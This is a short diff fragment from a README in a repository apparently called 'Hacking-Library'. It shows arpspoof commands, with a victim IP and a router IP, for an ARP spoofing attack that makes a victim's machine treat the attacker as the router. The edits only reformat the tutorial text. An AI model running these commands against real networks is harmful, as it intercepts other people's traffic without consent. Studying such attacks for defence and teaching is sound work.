Maulem/Hacking-Library/README.md

  sudo arpspoof -i eth0 -t 192.168.0.1 192.168.0.104
 ```

+#### Second terminal:

-- Then we make the victim think that our machine is the router:
+Then we make the victim think that our machine is the router:

 ```console
  sudo arpspoof -i {NETWORK_INTERFACE} -t {VICTIM_IP} {ROUTER_IP}